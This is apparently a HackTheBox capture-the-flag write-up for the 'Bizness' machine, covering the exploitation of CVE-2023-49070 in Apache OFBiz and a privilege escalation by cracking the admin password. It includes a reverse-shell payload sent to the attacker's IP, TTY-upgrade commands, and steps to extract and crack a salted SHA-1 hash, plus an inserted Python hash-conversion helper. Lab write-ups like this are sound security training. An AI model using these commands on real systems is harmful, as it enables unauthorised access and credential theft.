💼Bizness

Enumeration

First, let's identify all the running services. We can do a quick nmap scan:

nmap bizness.htb
PORT    STATE SERVICE
22/tcp  open  ssh
80/tcp  open  http
443/tcp open  https

Looks like we have a webserver, so let's run feroxbuster to try and find some interesting files or directories:

feroxbuster --url https://bizness.htb -k

One of the results is the /ap endpoint, which is running Apache OFBiz v18.12. A quick Google search finds CVE-2023-49070, which allows for unauthenticated RCE!

Exploitation

Let's start a reverse shell listener using ncat:

nc -lvnp 8888

And then we can use the PoC exploit (https://github.com/jakabakos/Apache-OFBiz-Authentication-Bypass):

python3 exploit.py --url https://bizness.htb --cmd 'nc -c /bin/bash 10.10.14.183 8888'

And now we have a simple shell. The next step is to upgrade it to a TTY shell so we can get better control.

python3 -c 'import pty; pty.spawn("/bin/bash")'
[CTRL+Z]
stty raw -echo && fg
export SHELL=/bin/bash; export TERM=screen; reset;

Privilege Escalation

OFBiz ships with the default credentials admin:ofbiz, but initial testing on the website showed that the admin password has been changed. It's probable that whatever password admin has been set to is also the root password (the typical password reuse scenario), so let's find where OFBiz stores its passwords.

I started by running grep -r "password" /opt/ofbiz and found that passwords are stored in XML as follows:

userLoginId="" 
currentPassword="{SHA}..."

Thus, we can do:

grep -r "userLoginId=\"admin\"" /opt/ofbiz

There are a few entries, e.g. 47b56994cbc2b6d10aa1be30f70165adb305a41a, but Crackstation.net reveals that this one is ofbiz, which we know isn't right. However, there is an interesting match:

grep: ./runtime/data/derby/ofbiz/seg0/c54d0.dat: binary file matches

We can add -a to our grep command to show binary matches:

grep -ra "userLoginId=\"admin\"" /opt/ofbiz
./runtime/data/derby/ofbiz/seg0/c54d0.dat:                <eeval-UserLogin createdStamp="2023-12-16 03:40:23.643" createdTxStamp="2023-12-16 03:40:23.445" currentPassword="$SHA$d$uP0_QaVBpDWFeo8-dRzDqRwXQ2I" enabled="Y" hasLoggedOut="N" lastUpdatedStamp="2023-12-16 03:44:54.272" lastUpdatedTxStamp="2023-12-16 03:44:54.213" requirePasswordChange="N" userLoginId="admin"/>

Now we have an interesting match that contains a salted SHA hash. Essentially the format is $algorithm$salt$hash (here the algorithm is SHA, the salt is d, and the hash is a Base64url-encoded digest), and we can convert this to a format that John or Hashcat supports. We need to go from Base64url -> Base64 -> Hex.

Looking at the hashcat example hashes page (https://hashcat.net/wiki/doku.php?id=example_hashes), we can use mode 110 or 120 for salted SHA-1. All in all, our Hashcat command will be:

echo 'b8fd3f41a541a435857a8f3e751cc3a91c174362:d' > ofbiz_hash
hashcat -a 0 -m 120 ofbiz_hash /usr/share/wordlists/rockyou.txt
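The Base64url -> Base64 -> Hex conversion above, done in Python as an added example that is not part of the original writeup: it parses the $SHA$salt$hash string, produces the hex:salt line for hashcat mode 120, and recomputes sha1(salt + password) to check a candidate password, which is what mode 120 (sha1($salt.$pass)) cracks. The helper names are my own, and the sample password in the round-trip test is constructed.

```python
import base64
import hashlib


def ofbiz_to_hashcat(entry: str) -> str:
    """Convert an OFBiz '$SHA$<salt>$<base64url digest>' entry into the
    '<hex digest>:<salt>' line that hashcat -m 120 expects."""
    parts = entry.split("$")
    if len(parts) != 4 or parts[0] != "":
        raise ValueError("expected $algorithm$salt$hash, got %r" % entry)
    _, algorithm, salt, b64url = parts
    if algorithm.upper() != "SHA":
        raise ValueError("this helper only handles the SHA (SHA-1) algorithm")
    # Base64url -> Base64: swap the URL-safe alphabet back and restore the
    # '=' padding that OFBiz strips from its encoded digests.
    b64 = b64url.replace("-", "+").replace("_", "/")
    b64 += "=" * (-len(b64) % 4)
    digest = base64.b64decode(b64, validate=True)
    if len(digest) != 20:
        raise ValueError("SHA-1 digest must be 20 bytes, got %d" % len(digest))
    return "%s:%s" % (digest.hex(), salt)


def ofbiz_sha_hash(password: str, salt: str) -> str:
    """Build an entry in OFBiz's format: sha1(salt + password), Base64url
    encoded without padding. Used here only to round-trip the parser."""
    digest = hashlib.sha1(salt.encode() + password.encode()).digest()
    b64url = base64.urlsafe_b64encode(digest).decode().rstrip("=")
    return "$SHA$%s$%s" % (salt, b64url)


def verify_candidate(entry: str, candidate: str) -> bool:
    """Check a candidate password against an entry the same way mode 120
    does: hash salt + candidate and compare to the stored digest."""
    hex_digest, salt = ofbiz_to_hashcat(entry).split(":", 1)
    return hashlib.sha1(salt.encode() + candidate.encode()).hexdigest() == hex_digest


if __name__ == "__main__":
    # The admin entry recovered from the Derby data file above.
    print(ofbiz_to_hashcat("$SHA$d$uP0_QaVBpDWFeo8-dRzDqRwXQ2I"))
```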

We have now cracked the password and can try it for root:

su root
cd /root
cat root.txt
